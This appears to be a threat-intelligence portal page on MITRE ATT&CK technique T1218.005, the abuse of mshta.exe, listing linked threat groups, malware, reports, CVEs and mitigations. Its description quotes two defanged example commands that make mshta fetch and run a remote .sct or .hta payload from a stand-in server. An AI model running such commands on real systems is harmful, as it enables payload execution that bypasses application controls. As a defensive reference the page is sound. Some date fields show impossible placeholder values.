T1218.005: T1218.005

Search IOCs, vulnerabilities, APT…

216.73.216.233

← Back to attack patterns

View on MITRE ATT&CK The MITRE Corporation · Published 23/01/2020 20:32 · Modified 04/06/2026 11:08

Essential information

MITRE technique ID: T1218.005
Confidence: 100/100
Revoked: No
Published: 23/01/2020 20:32
Modified: 04/06/2026 11:08
Author / Source: The MITRE Corporation

Aliases

Mshta

Platforms

windows

Description

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))` They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta` Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

Kill chain phases

Kill chain	Phase
mitre-attack	defense-evasion

Marking (TLP)

External references

Red Canary HTA Abuse Part Deux
mitre-attack (T1218.005)
Wikipedia HTML Application
Cylance Dust Storm
FireEye FIN7 April 2017
FireEye Attacks Leveraging HTA
Airbus Security Kovter Analysis
LOLBAS Mshta
MSDN HTML Applications

Related entities

Intrusion sets, malware, reports, vulnerabilities, indicators and other entities linked to this technique.

Intrusion sets (APT) (34)

Sidewinder uses T-APT-04Rattlesnake

The MITRE Corporation Confidence 100

[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia,…

First seen 01/01/1970 · Last seen 16/11/5138 ·
Earth Lusca uses TAG-22Charcoal Typhoon

The MITRE Corporation Confidence 100

[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong,…

First seen 01/01/1970 · Last seen 16/11/5138 ·
APT-C-61 uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
Amatera Stealer uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
SideCopy, Transparent Tribe (APT36) uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
Kimsuky uses Black BansheeVelvet Chollima

The MITRE Corporation Confidence 100

[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter…

First seen 01/01/1970 · Last seen 16/11/5138 ·
Gamaredon Group uses IRON TILDENPrimitive Bear

The MITRE Corporation Confidence 100

[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name…

First seen 01/01/1970 · Last seen 16/11/5138 ·
EVALUSION uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
LockBit uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
SmartApeSG uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
APT-C-36 uses Blind Eagle

The MITRE Corporation Confidence 100

[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations…

First seen 01/01/1970 · Last seen 16/11/5138 ·
MuddyWater uses Earth VetalaStatic Kitten

The MITRE Corporation Confidence 100

[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at…

First seen 01/01/1970 · Last seen 16/11/5138 ·

← Previous

Page / 3

1–12 of 34

Emmenhtal uses

Family
CryptBot uses

Family
QuackBot uses

Family
Eliza RAT uses
ValleyRAT uses

Family
Revenge RAT uses
AsyncRAT uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
LummaC2 uses

Family
Oblique RAT uses
DesckVB RAT uses

Family
GRAYRABBIT uses

Family
KimJongRAT uses

Family

← Previous

Page / 6

1–12 of 65

KimJongRAT Continues to Evolve by Leveraging LOTS related

AlienVault Confidence 100 20 MITREs 2 Malwares 11 IOCs 7 Observables 1 APT
An unknown actor distributes malicious VBS scripts via … related

AlienVault Confidence 100 19 MITREs 3 Malwares 12 IOCs 9 Observables
Okendo Reviews Supply Chain Attack related

AlienVault Confidence 100 18 MITREs 5 Malwares 3 IOCs 3 Observables 1 APT
Potemkin Loader & RMMProject The Anatomy of a … related

AlienVault Confidence 100 19 MITREs 4 Malwares 22 IOCs 22 Observables
Inside DesckVB Rat Analysis: From Malspam to In-Memory … related

AlienVault Confidence 100 21 MITREs 2 Malwares 15 IOCs 15 Observables
Threat landscape — insurance related

Confidence 100 199 MITREs 11 APTs
ClickFix Gets Creative: Malware Buried in Images related

10 MITREs 2 Malwares 12 Observables
EVALUSION Campaign Delivers Amatera Stealer and NetSupport... related

16 MITREs 3 Malwares 1 Observable 1 APT
Malware or LLM? Silent Werewolf employs new loaders … related

15 MITREs 1 Malware 28 Observables 1 APT
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos … related

11 MITREs 1 Malware 5 Observables
Phishing campaign impersonates Booking.com, delivers a suite of … related

7 MITREs 6 Malwares 1 APT
Analysis: SmokeLoader malware distribution related

6 MITREs 4 Malwares

← Previous

Page / 3

1–12 of 25

Vulnerabilities (CVE) (12)

CVE-2021-44228 KEV targets

10.0 Critical

Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.

Attack vector: Network
Published: 10/12/2021
Modified: 27/05/2026

CVE-2023-22518 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contain an improper authorization vulnerability that can result in significant data loss when exploited by an …

Attack vector: Network
Published: 07/11/2023
Modified: 21/12/2025

CVE-2017-17562 KEV targets

8.1 High

Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.

Attack vector: NETWORK
Complexity: HIGH
Published: 12/12/2017
Modified: 22/04/2026

CVE-2017-9805 KEV targets

8.1 High

Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to …

Attack vector: NETWORK
Complexity: HIGH
Published: 15/09/2017
Modified: 22/04/2026

CWE-502

CVE-2025-59287 KEV targets

9.8 Critical

Microsoft Windows Server Update Service (WSUS) contains a deserialization of untrusted data vulnerability that allows for remote code execution.

Attack vector: Network
Published: 24/10/2025
Modified: 21/12/2025

Undergoing Analysis

CVE-2023-22527 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contain an unauthenticated OGNL template injection vulnerability that can lead to remote code execution.

Attack vector: Network
Published: 24/01/2024
Modified: 21/12/2025

CVE-2020-16040 targets

6.5 Medium

Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a …

Attack vector: NETWORK
Published: 08/01/2021
Modified: 27/01/2026

CVE-2023-22515 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts …

Attack vector: Network
Published: 05/10/2023
Modified: 21/12/2025

CVE-2025-20265 targets

10.0 Critical

A vulnerability in the RADIUS subsystem implementation of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to …

Attack vector: Network
Published: 14/08/2025
Modified: 27/05/2026

Awaiting Analysis

CVE-2022-26134 KEV targets

Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code …

Published: 02/06/2022
Modified: 27/05/2026

CVE-2025-7775 KEV targets

9.2 Critical

Memory overflow vulnerability leading to Remote Code Execution and/or Denial of Service in NetScaler ADC and NetScaler Gateway when NetScaler is configured …

Attack vector: Network
Published: 26/08/2025
Modified: 27/05/2026

Analyzed

CVE-2017-0199 KEV targets

7.8 High

Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for …

Attack vector: LOCAL
Complexity: LOW
Published: 12/04/2017
Modified: 22/04/2026

Attack patterns (MITRE) (1)

T1218 subtechnique-of

System Binary Proxy Execution MITRE

Campaign (2)

C0015 uses
Operation Dust Storm uses

Tool (2)

Covenant uses

The MITRE Corporation Confidence 100

[Covenant](https://attack.mitre.org/software/S1155) is a multi-platform command and control framework written in .NET. While designed for penetration testing and security research, the tool has also been used by threat actors…
Koadic uses

The MITRE Corporation Confidence 100

[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs…

Course Of Action (2)

Disable or Remove Feature or Program mitigates
Execution Prevention mitigates

Contact About Legal notice Privacy policy Terms of use